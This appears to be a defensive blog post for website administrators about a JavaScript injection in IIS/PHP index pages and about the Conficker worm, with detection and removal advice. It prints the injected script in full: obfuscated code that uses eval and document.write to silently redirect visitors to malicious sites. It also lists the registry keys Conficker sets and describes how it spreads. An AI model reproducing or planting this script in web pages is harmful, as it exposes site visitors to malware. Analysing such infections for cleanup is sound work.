Java Injection code in IIS

Annoyed by injection in your web site pages, then you’d look for following solution on it. Here is one of the javascript codes of an “injection” that inserts itself into the default page of a website. It is planned to go hidden by only redirecting arbitrarily.

Generally this code is inserted at the bottom of the source code of index or default page, with a considerable white space after the end of the normal source code. It redirects to a “spyware” or “virus” site. Even it is also not detected by antivirus programs.

It infects each and every .php file and does not re-infect after the initial infection. Generally it injects the code into .php (and .html) files about 115 lines below the end line of the normal code. It ONLY infects index.php/html files in the httpdocs directory of the website.

If you rename your file to some other name such as index2.php – it’ll not be infected. The “modified date” time stamps also change with the infection. Once you get the time stamp when it infected, search for files modified at that time.

var mf=” shapgvba ejtf(c){ine ro,con=\”HcvfNU)z\\\”n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\”,olq=\”\”,i,nnu,l=\”\”,n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}”,rmhc=“”;for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km=“<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\”G]$K;Ms$G’Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\”G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U”; rwgs(km);

Unable to connect to Microsoft website

Conficker is also know by Worm: Win32/Conficker.A & Worm:Win32/Conficker.B in Microsoft, Crypt.AVL in AVG, Trojan.Win32.Pakes.lxf for F-Secure, Trojan.Win32.Pakes.lxf in Kaspersky,

It works in the recurring copy itself using a random name to the %Sysdir% folder.

It modifies the registry key to create a randomly-named service on the compramised system:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{random}\Parameters\"ServiceDll" = "Path to worm"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{random}\"ImagePath" = %SystemRoot%\system32\svchost.exe -k netsvcs

It tries to connect to multiple websites to obtain the public IP address of the infected computer. It attempts to download a malware file from the remote website. It starts a HTTP server on any random port on the infected machine to host a copy of the worm.

Once one system on the network is infected, it continuously scans the whole subnet of the infected host for vulnerable machines and executes the exploit. If it gets success, then that computer will connect again to the http server and download a copy of the worm. Afterward variants of w32/Conficker.worm are using scheduled tasks and Autorun.inf file to duplicate on to non vulnerable systems or to re-infect previously infected systems even if they are cleaned.

You can check whether your system is infected or not?
You may find that you are not only unable to connect to Microsoft website, but also Anti-virus websites are not working.
Infected system Users are locked out of directory, access to admin shares get denied, scheduled tasks gets created, access to security related web sites is blocked.

Conficker removal tool from Microsoft

Remedy for this issue is to patch and reboot the infected system, If you detect this worm on your system, you should reboot to clean memory correctly. May be you will need to reboot more that one time. Scheduled tasks are used to be created on the system to re-activate the worm. Autorun.inf files re-activate the worm.